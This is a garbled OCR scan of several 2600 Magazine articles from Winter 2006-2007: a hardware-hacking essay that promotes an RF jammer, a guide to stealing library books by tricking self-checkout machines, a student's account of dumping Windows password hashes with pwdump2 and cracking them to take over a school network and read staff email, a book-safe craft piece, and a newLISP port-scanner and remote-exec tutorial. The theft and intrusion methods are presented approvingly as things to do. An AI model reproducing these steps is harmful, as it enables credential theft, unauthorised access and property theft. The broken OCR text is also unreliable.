the thi ngs everyone el se sees, but in a new and
as the pr i ces of gadgets and doodads dropped
di fferent way that ' s not i mmedi atel y apparent.
dramati cal l y (you can get a di gi tal camera for
Someti mes thi s l ens focuses on a cause, a
under $ 1 0 now), the abi l i ty to get i nforma
proj ect, or the des i re to fi ght for peopl e who
ti on out has greatl y i ncreased on an i ndi vi dual
can't necessar i l y hel p themsel ves. I t ' s part
l evel . Fl awed as they are, wi ki s, bl ogs, RSS,
curi osi ty and i t ' s part shari ng. But most of al l
YouTube, etc. si mpl y do not care about secrets
i t ' s human nature. I t ' s hard to stop mi l l i ons of
or nondi scl osure agreements. The i nformati on
years of evol ut i on. We' re meant to take thi ngs
on how thi ngs are made and how to bend them
apart and figure out how they work. Someti mes
i s gett i ng out there. The " reci pes" of how t hi ngs
these acti vi ti es aren ' t i mmedi atel y understood
are made, thei r i ndi vi dual components, and
or they' re consi dered cri mi nal by some. But
thei r secrets aren't as mysteri ous as they once
over and over agai n hi story has proven endl ess were. Want to make that "si ngl e use" camera
t i nkeri ng yi el ds some of the best resul ts.
mul t i -use? Or use i t as a n i ght vi si on cam? No
I spend my days and ni ghts wri ti ng how-tos probl em. A hardware hack and fi rmware mod
on bui l di ng el ectroni cs, publ i shi ng pri nt and l ater you have a cheap reusabl e devi ce for just
el ectroni c i nformati on i n an effort to recl ai m about anythi ng (ti nyur l . com/y6k3z8) .
part of the heri tage of the country I ' m a ci ti zen Prt of thi s "movement" of sorts i s "open
of, the Uni ted States of Ameri ca. We are a nati on source hardware," or open desi gn. To qui ckl y
of hackers and t i nkerers. Ben Frankl i n wasn ' t a defi ne thi s: open source software has and wi l l
presi dent, yet h e resi des on the top denomi na- conti nue to have a huge i mpact around the
ti on of our currency. That ' s how i mportant the wor l d - unpai d, l oosel y connected l egi ons of
i nventi ve i s. You can see my work in the pages devel opers have more strength and usual l y
of MAKE Magazine, Popular Science, hard- outperform any counterpart i n the propri etary
ware hacki ng books, and l ots of techi e si tes software arena. Peopl e who work on hardware
around the web. I thi nk the " how-to" is one of see the same benefi ts possi bl e and are br i ngi ng
the most powerful t hi ngs anyone can create. I t these pract i ces t o the wor l d of the physi cal .
can change mi nds and i nfl uence pol i ti cs. I t al l Engi neers t o garage t i nkerers are putt i ng hard-
depends on what you' re shari ng. . . . ware under the same l i censes you see wi th
On di spl ay at the Computer Hi story Museum computer appl i cati ons.
(computerhi story. org) i s a blue box previ ousl y Thi s i sn't anythi ng new. Ask you grand
owned by Steve Wozni ak, cofounder of Appl e parents about thei r AM radi os they l ovi ngl y
Computer. Why i n the wor l d woul d a pi ece of bui l t, mai ntai ned, and repai red. It woul d be
subversi ve technol ogy made to get free phone unheard of to not have user servi ceabl e parts
cal l s be cel ebrated al ongsi de Cray supercom- or documentati on. Recentl y we al most l ost
puters? I t's not the devi ce that's so speci al , i t's our way wi t h extended warranti es, tamper
the subcul ture it created, whi ch sti l l represents proof devi ces, and seal ed hardware. I t became
what hacki ng and expl ori ng technol ogy i s cheaper t o toss t hat ol d PDA than t o repai r. But
al l about for a l ot of past, present, and future now hi t Coogl e and see the hundreds of proj
hackers. ects, parts procurements, and possi bi l i t i es wi th
I ' m here to tel l you we're approachi ng a that ol d hardware.
new age of hardware hacki ng that wi l l have Compani es and even governments don't
profound consequences on the decades ahead. exact l y l i ke peopl e taki ng thi ngs apart or
Look around your home - dozens of cheap ci rcumventi ng "protecti ons" and here i s where
devi ces assembl ed i n other parts of the worl d, the subversi ve part comes i n . Subversi ve usual l y
Pa
g
e 26 2600 Ma
g
azine
means "a systemati c attempt to overthrow or
undermi ne a government or pol i ti cal system
by persons worki ng secretl y from wi thi n. " Not
exactl y the perfect defi ni t i on. After al l , there
aren't any secrets. I t's out i n the open. But even
the si mpl e act of t i nker i ng wi th el ectroni cs or
unl ocki ng your cel l phone i s certai nl y worki ng
wi thi n the system to enact change.
I t starts out wi th si mpl e acts of rebel l i on;
anyone can buy a CD, r i p the MP3s, and pl ay
thei r musi c on any devi ce. Why i n the wor l d
can't you do t hat wi th a DVD? Compani es
make portabl e vi deo devi ces and expect us al l
to go out and repurchase content we al ready
own to watch i t on the smal l screen. That's not
acceptabl e, so what happens? Dozens of open
source appl i cati ons are shared and posted to
r i p the DVDs. Thi s i sn't pi racy. The peopl e who
pi rate t hi ngs wi l l al ways get around any protec
t i on. Thi s is j ust fai r use.
I f you buy a cel l phone and want to swi tch
carri ers (GSM), the carri er unfortunatel y " l ocks"
the hardware and you' l l need to purchase a
new phone. Of course, the crafty i ndi vi dual
wi l l qui ckl y see there are dongl es, codes,
and art i cl es on hardware unl ocki ng. I t's such
a common practi ce, everyone l ooks the other
way.
These exampl es have gone on and on for
years. Fi nal l y, i n November of 2006, there
was change. The Li brary of Congress approved
a few copyri ght exempti ons. Professors can
l egal l y crack the DeCSS for archival purposes,
anyone can unl ock thei r cel l phone, ol d soft
ware can be cracked, and bl i nd persons can
u nl ock protected ebooks for audi o readers
(copyri ght. gov/1 201 /) .
Not bad, but we're j ust gett i ng started. We
can't l et up - thi ngs wi l l change for the better.
Gett i ng the i nformati on out there - pervasive
and compl ete - eventual l y makes any effort to
s i l ence the cri ti cs usel ess.
We're tol d there i s nothi ng to worry about
wi th RFI D, that i t's requi red for our passports
and everythi ng is goi ng to be OK. Turns out
there are major i ssues. I t onl y took a coupl e
of open hardware proj ects t o show how easy
i t was to cl one, even from a di stance, an RFI D
enabl ed passport. A mi nor concessi on was
pl anned - a metal l i c l i n i ng to protect the RFI D
chi p from bei ng read. I t's essenti al l y a t i n foi l
hat, go fi gure. The RFI D chi p wi l l b e encrypted
so i t can onl y be read when i t's swi ped. So
what's the poi nt of usi ng RFI D? Whi l e the battl e
rages on anyone can bui l d thei r own reader,
cl oner, and captur i ng devi ce (cq. cx/proxmark3 .
pl ) . Code and schemati cs are i ncl uded.
Ci ti es and l arge compani es ( Googl e) are
acti vel y seeki ng to cover every square i nch
wi th wi fi . Extremel y conveni ent, sure. But so i s
broadcast i ng your I D wi t h RFI D chi ps. Conve
n i ences that gi ve up privacy aren't al ways
worth the trade. Maybe it wi l l al l work out and
our data wi l l be safe, i t wi l l never be abused,
and uni corns wi l l graze on the fi el ds as we
l i ve bl i ssfu l l y. What's more l i kel y to happen i s
tracki ng, data mi n i ng, and i ncredi bl e breaches
of personal i nformati on and securi ty. But when
your ci t i es are fi l l ed wi th the si gnal , there i sn't
rea l l y a way to stop it even i n you r home or
busi ness, r i ght? Maybe not. I n thi s i ssue of
2600 is the ci rcui t di agram and i nformati on to
bui l d the wor l d's fi rst open source cel l phone
and wi fi j ammer ( l adyada. netlmakewave
-bubbl e/) . The proj ect was created by Ladyada
and supported by Eyebeam i n col l aborati on
wi th the cDc.
The project detai l s the desi gn and construc
ti on of a sel f-tun i ng, wi de-bandwi dth, portabl e
RF j ammer (870-894MHz, 925-960MHz,
1 805- 1 880MHz, 1 930-1 990MHz and 2400-
2483MHz - 802 . 1 1 bIg) .
Whi l e movi e theaters and churches l obby
to get cel l phone j ammers l egal i zed for thei r
own uses ( but not for " regul ar fol ks"), i t's now
possi bl e to at l east have a chance of havi ng the
same capabi l i t i es our future nanni es wi l l have
over us.
There's a whol e sl ew of sayi ngs that start
of wi th " I t's better to have i t and not need i t
t han need i t and not have i t . " They usual l y refer
to nucl ear weapons, vol tage, parachutes, and
condoms. But i n t hi s case i t's somethi ng that
mi ght be j ust as i mporant.
At the ti me of thi s wri ti ng a Freedom of
I nformati on Act request reveal ed the approval
of the "Acti ve Deni al System" or ADS. Thi s
weapon i s certi fi ed for us e i n I raq and uses 94
GHz ( 3 mm wavel ength) waves to " i nfl i ct pai n"
on humans (ti nyur l . com/y8ap66) . The efects
are sai d to feel l i ke bei ng di pped i n mol ten
l ava. Thi s i s i ncredi bl y scary stuf. Woul dn't i t
be good to know i t wi l l never be used agai nst
i nnocent popul ati ons? There's onl y one guar
antee. Someone wi l l need to rel ease the
i nformati on on how to stop i t. I t's not r i ppi ng
DVDs, or usi ng a mod chi p i n an Xbox, or even
j ammi ng cel l phones to keep cal l s out of your
home. But tasers and rubber bul l ets have been
abused. What's to stop t hi s?
Who knows? Maybe t he cel l phone/wi fi
j ammer wi l l end up i n the computer museum
20 years or s o from now as a footnote i n the
hi story of subversi ve technol ogy that l ed to
many many other i nnovati ons.
Winter 2006-2007P
g
e 27
Pa
g
e 28 2600 Ma
g
azine
iI
'
g
s
I +IuI
}
`t |HCCKUD!
utHII1t X[lUI!
by Byron Bussey
I l ove the l i brary and what i t stands for (I am more
a poeUwri ter than a hacker, but at the core I don ' t
t hi nk there i s much di fference between t o two i deo
l ogi cal l y, perhaps j ust in thei r method) . So I woul d
be the fi rst t o speak agai nst steal i ng books irom the
l i brary. But neverthel ess there has come to me vi a
that thi ng cal l ed curi osi ty d very si mpl e way to do
j ust that whi ch i nvol ves nothi ng more than a si mpl e
mani pul ati on of t he sel f-checkout machi ne. I wri te
t hi s then as a warni ng to l i brary staff and the engi
neers who desi gn such mach i nes. As they now stand,
these devi ces coul d be used by nefari ous persons to
steal books and wal k ri ght out the door wi th them
scot-free.
The machi nes in questi on, whi ch I assume are i n
al l l arge l i brari es, are i n use both at my uni versi ty and
i n my ci ty l i brary. Wal ki ng up to the checkout wi th
book i n hand, there wi l l be a huge l i ne of peopl e
wai ti ng for t he l i brari an/monkey-drone t o scan out
thei r books. To t he ri ght wi l l be si x of these machi nes
that most peopl e are too afrai d to try and fi gure out.
( Every ti me I go to the l i brary there i s at l east one
person tryi ng to do i t and fai l i ng mi serabl y) . Anyways,
the process is si mpl e. You put in your l i brary card and
then enter the l ast four di gi ts of the tel ephone number
associ ated wi th the card. You are then presented wi th
a screen prompti ng you to scan each book. Basi
cal l y you l i e the book down on the tabl etop of the
machi ne and, sl i di ng i t forward, l i ne up the bar code
reader with the bar code affi xed to the front cover
of the book. I f i t scans correctl y there i s a cl unki ng
sound ( i t sounds as i f i t i s a physi cal motor) and the
book i s demagneti zed and recorded i nto the network
as "checked out. " A recei pt i s generated at the end
of the sessi on and you are free to l eave. Of course,
the hacker in us i mmedi atel y wonders: maybe there
coul d be a way to tri ck the machi ne i nto demagne
t i zi ng a book for us wi thout havi ng i t be l i nked to our
card t o gi ve oursel ves an unl i mi ted amount of ti me to
use and peruse any book we wi shed? But of course,
one j ust needs to si mpl y take two books, pl ace the
book they wi sh to own down on the tabl etop, and
then put the second book on top of i t. As the mach i ne
scans the top book as checked out, i t demagneti zes
the bottom book. The book you can now take past
the al arm sensors i s not checked out at al l whereas
the one that is checked out i s sti l l magneti zed. Now
obvi ousl y there is a I i ttl e l ogi sti cal probl em here, for
if you wal ked out the door the al arm woul d ri ng.
But i t ' s not too hard to fi gure out a sol uti on to t hi s
one. I f we watch the security guard who deal s wi th
the al arm al l day, we noti ce that upon al arm ( i t i s
tri pped at my l i brary at l east t en ti mes an hour), he
wi l l take t he person ' s check out s l i p and coml ' i t
wi th the books he has i n hi s hands. So i f we I ' ur
demagneti zed book i n a backpack and wal ked out
wi th our check out s l i p and the checked out copy
of Char/ottp's Web, the al arm woul d sound and he
wou l d ask us to pass i t around the sensors and have
us wal k through agai n to see i f we coul d go through
wi thout sett i ng i t off agai n. Of course we cou l d do so
wi thout probl em and with a I i ttl e fri endl y banter, be
ri ght on our merry way. For l arger scal e operati ons ( a
book rati o of 1 : 1 i s necessary), thi s coul d be worked
with an accompl i ce who takes al l the demagneti zed
ones out whi l e the other sets the al arm off with the
checked out ones.
Now why woul d anyone do thi s besi des havi ng
a zea l ous and mi sgui ded l ove for books? Wel l i f you
go and l earn a l i ttl e about book col l ect i ng you wi l l
fi nd that your l i brary actual l y has a number of rare
books, or fi rst edi ti ons, that they have amassed over
the years, and whi ch hol d a consi derabl e val ue.
Even i f we sti ck to modern hard covers and check
out abebooks. com for the three vol umes of Dante's
Inferno, Purgatory, and Paradise transl ated by Al l en
Mandel baum, we fi nd a mi ni mum pri ce of $65 and
a top of $1 75 for each book. Of course, more di ggi ng
mi ght t ur n up some hi gher val ues. Al l t hi s h i ghl i ghts
i s that the motivati on for book steal i ng coul d be,
at core, economi c, and we al l know we l i ve in an
era where any i nfamy perpetrated in the pursui t of
weal th can (somehow) fi nd j usti fi cati on.
Now what i nterests me most about t hi s whol e
t hi ng i s not that I can steal books (whi ch woul d be
poi ntl ess because I can si mpl y borrow them) , but
that for years steal i ng books from the l i brary must
have been fai r l y easy. Before there were al arms and
the l i ke, not hi ng was stoppi ng you. And yet here
in the present, one technol ogy in the form of sel f
checkout machi nes can be mani pul ated to defeat
another technol ogy in the form of securi ty sensors -
whi ch bri ngs us back to the same si tuati on as before!
Perhaps no matter how many l ayers of technol ogy
we pi l e atop our dai l y l i ves, at the end of the day
our freedom is ours to make, and that is the human
choi ce. Keep t hi nki ng!
Winter 2006-2007Pa
g
e 29
fun
L
by Croni d3
cronid3@gmai l . com
My school uses a Novel i/NetWare network and
manages its users wi th GroupWi se. I ' d been tryi ng
for the past two years to somehow attai n network
passes. However Novel l ' s password database i s quite
secure. The mai n user/pass database on the server is
encrypted wi th some ri di cul ous RSA encrypti on and
i s nearl y i mpossi bl e to get to. However, when users
l ogi n, thei r passwords are stored i n XP' s SAM fi l es.
That sounds l i ke a good target. As many of you prob
abl y know, there are several programs out there for
"extracti ng" thi s data. One of them i s the ever-i nfa
mous pwdump. I t has several versi ons (pwdump,
pwdump2 . . . al l the way through pwdump6) . Al l
of these vari ati ons use the DLL- i njecti on method
(samdump. dl l ) under the I sass. exe process. Unfortu
natel y, many of these programs no l onger work ( and
usual l y crash the machi ne) because of the vari ous
patches and servi ce packs. Even more so, our admi ns
thought t hey were secure wi th SYSKEY on the
machi nes, whi ch encrypts the hashes. A tri cked-out
versi on of pwdump2 (ori gi nal l y wri tten to run under
NT4) that I found seemed to do the tri ck.
You can l ocate thi s versi on of pwdump2 and
several others at http:/www. openwal l . com/pass
. wordslmi crosoft-wi ndows-nt-2000-xp-2003 .
Run pwdump2 through the command prompt
and voi l a! The usernames and NTLM hashes for al l
the users that have ever l ogged on t o the machi ne
through Novel l ! ( Mi nd you, our school ghosts al l
t he machi nes twi ce a year, so i t ' s onl y t he users that
have l ogged on si nce the l ast ghosti ng) . Runni ng
these passes t hrough 1 0pht or another pass-cracki ng
program ( I l i ke j ohn the ri pper) wi l l gi ve you most
of the passes wi thi n a few mi nutes. Some of the
"tougher" ones wi l l take a few hours. I nevi tabl y
our sysadmi ns have l ogged onto 90 percent of our
school ' s machi nes themsel ves, so guess who runs
our network now? NetWare admi ni strator, Group
Wi se managers, gradi ng programs, al l at my fi nger
ti ps. However, not bei ng a " cracker" (aka the bad rep
that al l " hackers" are gi ven), I have not abused thi s
pri vi l ege, al though the amount of power I have i s
trul y amazi ng havi ng ful l read/wri te access t o our fi l e
server, our web server, and both our backup servers.
After several days of expl ori ng, I real i zed that it
must have s l i pped my mi nd that I had access to al l
staf emai l . Why not take a peek, ri ght? As i t turns
out, perhaps some thi ngs are best left undi scovered.
Apparentl y, as Moebi us Stri p al so di scovered i n hi s
arti cl e i n 23: 2, i nteroffice romances do occur qui te
often. As I ' m sure you can i magi ne, al l of thi s new
power I had in my hands was such an i nsane rush and
i t was quite hard to keep mysel f from shari ng i t wi th
everyone I knew. I knew I had to though because as
I ' d l earned from previ ous ventures, however untrace
abl e you can make yoursel f or how perfectl y you
execute your pl an, it' s al ways the peopl e you tel l that
get you caught.
I nteresti ngl y enough, one of our sysadmi ns seems
to condemn the use of Fi refox (or any al ternati ve
browser for that matter), whi ch i s odd because I ' ve
met many di e-hards for Fi refox, Opera, or whatever
other browser, but I ' ve never met a di e-hard IE fan.
Guess there' s a fi rst for everythi ng. As an Apri l Fool ' s
j oke, I made a l i ttl e addi ti on t o t he l ogi n scri pts that
removes I E from the NDS " Novel l -Del ivered Appl i ca
ti ons" wi ndow and adds Fi refox to i t i nstead. Both
of our admi ns, who are l ess-than-i ntel l i gent, sti l l
haven' t fi gured i t out.
Another popul ar t hi ng that ki ds fool around wi th
on our network i s nwsend, whi ch i s l i ke i nstant
messagi ng through Novel l on the i ntranet. I ncl uded
by Novel l by defaul t, our admi ns have di sabl ed i t. But
you can downl oad i t free from downl oad. com, etc.
I ' d t hi nk that if they' d j ust l et the ki ds have i t that the
exci tement woul d bl ow over after about a week and
no one woul d care about i t much anymore. After al l ,
through t he program you can bl ock messages from
users, so teachers, etc. , can bl ock everyone and not
be harassed. I fi gured I woul d test t hi s theory out, so
I re-enabl ed nwsend through Novel l and, to say the
l east, my theory wasn' t qui te ri ght. Maybe i t di dn' t
have enough t i me t o mature, but I quite obvi ousl y
fai l ed to account for ki ds that have "ski l l s, " pri me
exampl e bei ng scri pt-ki ddi es that run a program that
fl oods the system wi th messages and crashes the
network. Our admi ns feroci ousl y l ocked down the
whol e network and scurri ed about tryi ng to fi gure out
who re-enabl ed nwsend and l ooked through l og fi l es
to see who maybe l ogged i n or somehow got thei r
pri vi l eges rai sed. Of course they found nothi ng. The
onl y users that had l ogged in wi th admi n pri vi l eges
had been themsel ves, so they i mmedi atel y began
accusi ng each other and argui ng, fou l l anguage
bei ng the pri mary vocabul ary. I l ove when dumb
admi ns make themsel ves l ook even dumber.
On a fi nal note, don' t try these methods if you
have a somewhat competent sysadmi n ( hahaha) who
reviews the l ogs regul arl y. However, i f your case i s
l i ke mi ne . . . . What ' s that I smel l ? Coul d i t be some
badass pranki ng? I thi nk i t i s.
ge 30 2600 Magazme
ovtoutd
a ookDa!e
by c-dollar
We a l l l ove 2600 for i ts hi ghfal ut i n art i cl es on
port knocki ng, Cal l er I D spoofing, Wal mart sel f
checkout hacks, etc. , but, someti mes we l ose si ght
of the obvi ous stuf. Sooner or l ater, the North
Koreans or I rani ans are goi ng to bomb us. When that
happens, how are you goi ng to pay for doughnuts
and beer from the 7-1 1 ? I t ' d be nice to assume you
have money in your wal l et or shoe, but that may
not be the case. Where are you goi ng to hi de your
emergency cash? I n a bi bl e? I n a shoe? Wel l , that' s
up to you; mi ne wi l l be safel y tucked i n a copy of
Jane Eyre, unl i kel y to be di scovered by the i nvadi ng
ground troops.
For hundreds of years, i f not thousands, book
safes have been used as a way to conceal t hi ngs.
Even though you may not be capti ve i n a state pen
awai t i ng a fi l e stored i n a book (or a cake), a book
safe may be for you. I t ' s unl i kel y that a cursory search
of you r dwel l i ng wi l l turn up somet hi ng hi dden in a
book.
Maki ng one i s si mpl e and requi res l ess than an
afternoon. Fi rst t hi ngs fi rst - acqui re the necessary
materi al s:
1 book (preferably hardcover and larger than six by
nine inches)
1 bottle of Elmer's White Clue
1 cheap one inch foam paint brush (or if you're
really cheap, a piece of a t-shirt or sock)
1 box cutter
1 Dremel rotary tool (or similar - optional)
1 ruler
1 desire to hide something in plain sight
Regardi ng the mater i al s, books are easy to come
by. Pl ease don' t steal a book from the l i brary; l i brari es
are awesome. Co to a garage sal e and grab any book
of the appropri ate si ze. The bi gger the better, and
the more obtuse the subject matter the better. Don' t
pay more than a dol l ar for t he book. Bonus poi nts i f
you choose a crappy book packed wi th ri ght-wi ng
pol i ti cs.
Open the book. Ski p the fi rst 1 5 pages or so. Use
your rul er to draw a rectangl e you' re goi ng to cut out.
Keep the rectangl e at l east two i nches from each si de.
My fi rst attempt fai l ed due to my attempt to hol l ow
out too much of the book. Now I know you al l have
Dremel s that you used to cut vani ty wi ndows on your
li an li cases, but they' re not a necessi ty. A box cutter
or X-Acto knife wi l l work fi ne.
I n any case, choose your weapon and begi n
cutt i ng on t he rectangl e you drew. I f you use a
Dremel , be very careful not to set the book on fi re
- ai m to cut around 20 pages at a ti me. Hol d the
Dremel i n paper for more than 30 seconds and
you' ve got a fi re on your hands.
Once you' ve compl eted the fi rst rectangl e, pul l
out t he secti on of pages you ' ve cut. I f you ' re havi ng
troubl e pul l i ng out the pages, use the box cutter or
X-acto kni fe to tri m the parts you mi ssed. Py speci al
attenti on to the outer edge of the book; you real l y
don' t want t o tear those pages or t he end product
won' t l ook convi nci ng. Repeat unti l you' ve hol l owed
out enough of the book to hol d your secret. Pti ence
is a vi rtue; if you move too fast, you' re goi ng to mess
up the pages and your safe won' t be so steal t h.
Once you ' ve hol l owed out enough of the book,
empty any paper shards i nto the trash. Cl ose the
book and squi rt your whi te gl ue i nto a contai ner.
Di p your brush in the gl ue and pai nt the edges of
the exposed pages. Lay the book fl at, put somethi ng
heavy on i t , and l et i t si t for a few hours. Once i t ' s
dry, open t he cover and tri m t he edges of the openi ng
usi ng t he box cutter or X-Acto kni fe. Once you have
smooth edges, use your pai nt brush and spread more
whi te gl ue on the i nsi de of the secret compartment.
An hour l ater, you have your book safe! Now, stuff i t
wi th cash, i mporant papers, Del l coupons, or what
ever. Rest assured, i t wi l l take i nvadi ng armi es qui te
awhi l e to fi nd your stash !
Winter 2006-2007Pge 31
by axOn
newLi SP (www. newl i sp. org) i s a rel ative
newcomer to the i nterpreted l anguage arena i n terms
of popul ari ty. Whi l e i t had i ts humbl e begi nni ngs
back in 1 991 when Lutz Muel l er started worki ng on
it, onl y i n the l ast four years has devel opment been
consi stentl y acti ve.
newLi SP i s everythi ng that ol d-school LI SP
l anguages are, wi t h a l ot of modern features. Fi rst off,
i t ' s a scri pti ng l anguage that' s extremel y fast. It has
networki ng abi l ity that ' s powerful enough to wri te
TCP or UDP cl i ent or server appl i cati ons. Then, to
top that off, i t has a command cal l ed net-eva I whi ch
makes newLi SP stand out from the crowd by gi vi ng
i t the uni que abi l ity to eas i l y di stri bute tasks to other
nodes over a network connecti on.
Bi nari es ( under 200 ki l obytes) are avai l abl e for
Wi ndows, BSD, Li nux, Mac as x, Sol ari s, and a
host of other pl atforms. I t is rel eased under the GPL.
Performance i s al so second t o none. newLi SP has
been toppi ng the charts on scri pt i nterpreter bench
marks i n several categori es thanks to i ts smal l si ze
( under 200 ki l obytes) and effi ci ent C code. It outruns
php, perl , and even ruby.
newLi SP al so has some other tri cks up its sl eeve
that make i t an excel l ent system admi ni strati on
do network operati ons or di stri buted computi ng wi th
mi ni mal efort.
I am l ucky to have been abl e to work di rectl y
wi th Lutz, the founder and creator of newLi SP. I got d
few di rect l essons from hi m and, from there, started
t i nkeri ng wi th i t on mv own. Wi th that, the fi rst thi ng
I di d was create a makeshift port scanner. I l earn
easi est by exampl e, so here i s what I came up wi th.
[ port . lsp ]
#! /usr/bin/newlisp
( set ' params ( main-args
( if ( length params ) 5 )
( begin
( println " USAGE : port . lsp
host begin-port end-port " )
( exit )
( set ' host ( nth 2 params
( set ' bport ( int ( nth 3 params )
( set ' eport ( int ( nth 4 params )
( for ( port bport eport )
( begin
)
( set ' socket ( net-connect host port
( if socket ( println port " open "
scri pt i ng l anguage. I t has decent fi l esystem support
( exit )
so i t can see if fi l es or di rectori es exi st and determi ne
The first part si mpl y
assi gns the command l i ne
i f a fi l e' s permi ssi ons are acceptabl e for readi ng or
arguments i nto a l i st cal l ed params, then makes sure
wri ti ng. It has very powerful text processi ng abi l i ty
that four parameters were gi ven (program name,
usi ng PCRE ( Perl Compat i bl e Regul ar Expressi ons) .
host, begi n port, and endi ng port) . I f not, i t di spl ays a
Fi nal l y, i t' s al so worth menti oni ng that newLi SP can
usage t i p before exi ti ng.
easi l y i mport whol e functi ons from dynami c l i brari es
The second part assi gns el ements of the l i st to
such as l i bmysql cl i ent ( i nstant MySQL access from
appropri ate vari abl es, then uses a for l oop to i terate
wi thi n newLl SP! ) , tclltk (for creati ng graphi cal
through the ports, di spl ayi ng open port numbers that
appl i cati ons i n newLl SP), and zl i b (for com pres-
are open. Note that on machi nes with packet fi l ters
sion and decompressi on) j ust to name a few. Thi s
that " drop" packets, t hi s port scan wi l l take a very
makes newLi SP one of the most robust and fl exi bl e
l ong ti me. nmap i s a much more robust port scanner,
l anguages around.
however t hi s l i ttl e scri pt demonstrates t he power of
As you can tel l , newLi SP is a formi dabl e choi ce
newLl SP' s network commands. We' l l run thi s as a
for hackers, geeks, network admi ns, or securi ty
test j ust for fun:
professi onal s wi shi ng t o create scri pted programs to . /port . lsp 1 92 . 1 6 8 . 0 . 1 0 5 1 2 0 0
Page 32 2600 Magazine
2 1 open
22 open
23 open
25 open
79 open
1 1 1 open
Now, l et ' s l ook i nto di stri buted computi ng, sha l l
we? The core command behi nd newLl SP' s di stri b
uted computi ng power - cal l ed " net-eval " - operates
on a l i st of l i sts ( si mi l ar to a t hree di mensi onal array) .
The i nnermost l i st i s a l i st of host, port, and a str i ng
represent i ng t he command(s) you wi sh t o r un on
the remote node. The outermost l i st can contai n as
many host-port-command l i sts as your heart desi res,
al l owi ng you to run many di stri buted processes at
once and get the resu l ts back a l l at the same t i me.
Then, out si de those l i sts i s a ti meout i n mi l l i seconds.
I f a resul t i sn' t ret urned i n t he ti meout peri od, t he
operati on returns " ni l " ( t hat i s, fal se) . To cl ar i fy, net
eval syntax i s as fol l ows:
(net-eval (list (list "host " port-number command
string)) timeout)
On each remote node, you must have a newLi SP
l i stener, whi ch i s s i mpl y started by runni ng " newl i s p
-c -d { port number" from t he command l i ne. On
UNI X envi ronments, you may put an ampersand ( &)
at t he end t o l aunch i t i n t he background, or you
may even wi sh to use "set NOHUP" and l og off to
l eave i t r unn i ng in the background i ndefi n i tel y. In my
exampl e, I went to my Sol ar i s box and l aunched i t,
l i sten i ng on port 3 1 3 3 7 as fol l ows:
$ newlisp -c -d 3 1 3 3 7 &
2 6 7 2
$
I al so l aunched newLi SP l i steners on vari ous other
machi nes on my home network, i ncl udi ng a few
OpenBSD machi nes and my wi fe' s MUD/BBS server
r unni ng Wi ndows Server 2003 wi th the "Servi ces for
UNI X" tool s i nstal l ed.
Now, care must be taken. I t i s a bad i dea to have
a newLi SP l i stener runni ng on a publ i c IP address,
because commands l i ke process or exec can l aunch
shel l processes on the newLi SP node, whi ch i s j ust as
good as gi vi ng away an unprotected shel l account on
your network. I advi se usi ng newLi SP l i stener nodes
onl y behi nd a NAT or fi rewal l , or on a segregated
network.
Let ' s run a test scri pt, sha l l we? I n LI SP, bool ean
and math operati ons are al ways performed by pl aci ng
the operator fi rst, fol l owed by the symbol s to appl y
i t to. I n addi t i on, the symbol s are numbers, but they
cou l d eas i l y be str i ngs or l i sts wi th some operati ons.
Addi ng 1 +2 i n LI SP i s as si mpl e as ( + 1 2) . I wi l l start
hy runni ng a qui ck addi ti on operati on on one remote
node wi th a 3000ms ( 3 second) ti meout.
[ net-eval-test . lsp J
# ! /usr/bin/newlisp
( set ' evalstring " ( + 1 2 ) " )
( println ( net-eval ( list ( list
" 1 9 2 . 1 6 8 . 0 . 5 5 " 3 1 3 3 7 evalstring 3 0 0 0
( exit )
When we run it , we get the answer to
this mind-boggling math problem:
$ . /net-eval-test . lsp
( 3 )
Now, to expand t hi s even more, I have added
t hree other nodes i nto the mi x, whi ch shows more
cl earl y how the nested l i st syntax of net-eval works,
and I ' l l demonstrate remote command executi on at
the same ti me, usi ng the "exec" command. Noti ce
how the quotes around the command to he run i s
escaped wi th backs l ashes. Thi s i s needed t o keep
from confusi ng the i nterpreter. To put quotes i nsi de
a quoted stri ng, you need to escape t hem. Thi s i s
al most uni versal to al l programmi ng l anguages. On
UNI X- l i ke pl atforms, uname i s used to get i nforma
t i on ahout the operati ng system and archi tecture.
uname -s - n - m wi l l l i st the as that ' s runni ng, the
hostname, and the machi ne archi tecture.
[ uname . lsp J
# ! /usr/bin/newlisp
( set ' evalstring " ( exec
" uname -s -n -m\ " ) " )
( println ( net-eval ( list
( list " localhost" 3 1 3 3 7 evalstring )
( list " 1 92 . 1 6 8 . 0 . 5 5 "
3 1 3 3 7 evalstring )
( list " 1 9 2 . 1 6 8 . 0 . 1 0 2 "
3 1 3 3 7 evalstring )
( list " 1 92 . 1 6 8 . 0 . 1 2 7 "
3 1 3 3 7 evalstring )
) 3 0 0 0
( exit )
The resul t is a newLi SP l i st of str i ngs, contai ni ng
the resul ts of r unni ng the command:
$ . /uname . lsp
" SunOS sparky sun4u" ) ( " OpenBSD compy3 8 6
i3 8 6 " ) ( " OpenBSD bouncer sparc " )
( " Windows mudbbs x8 6 "
The onl i ne documentat i on for newLi SP i s very
extensi ve and features a few rather advanced demon
strati on scri pts, i ncl udi ng a worki ng web server
wri tten enti rel y i n newLi SP. Whi l e l earni ng a new
programmi ng l anguage i s never easy, new LI SP i s
more than mature enough i n hoth i mpl ementati on
and documentati on to make i t a pretty easy l anguage
to add to your l i st.
Li nks
http: //www. newl i sp. org - NewLi SP Websi te, ful l
of demonstrati on newLi SP programs, documenta
ti on, bi nari es for many pl atforms, and newLi SP
sou r ee code.
http://newl i sper. bl ogspot. com NewLiSPer i s
a j ournal , or bl og, wri tten by a guy who was j ust
l earn i ng newLi SP. I t ' s turned i nto a bunch of newLi SP
tutor i al s wi t h some phi l osophy tossed i n as wel l .
http://www. nodep. n l /newl i sp - Norman' s code
sni ppets i s a websi te fu l l of newLi SP programs and
sni ppets for Li nux ( not tested on ot her pl atforms) .
There are a l ot of real l y i nterest i ng appl i cati ons and
wi dgets avai l abl e to down l oad.
Winter 2006-2007Pa
g
e 33
Lonversa
Suggestion
Dear 2600:
I ' ve j ust di scovered Revi si on3 - the onl i ne TV
stati on - and I thought why don' t you guys at 2600 do
Off The Hook as a TV show as wel l ? I t woul d j ust be
you guys in the studi o tal ki ng but you coul d then edi t
the vi deo afterwards and throw i n screenshots, l i nks,
vi deo cl i ps, or somethi ng el se about the topi cs you
are tal ki ng about. I thi nk i t woul d work qui te wel l and
I ' m sure most of us 2600 readers woul d l ove i t.
aft
It sounds like a great idea but the prohlem is that
all of these endeavors take a great deal of wrk and
coordination and our time is already pretty stretched
to the max. If it' pos.ible to pull something like this
off we'll certainly give it a try.
Reaction
act l i ke George Bush cl i mbed i nto our tel ephones.
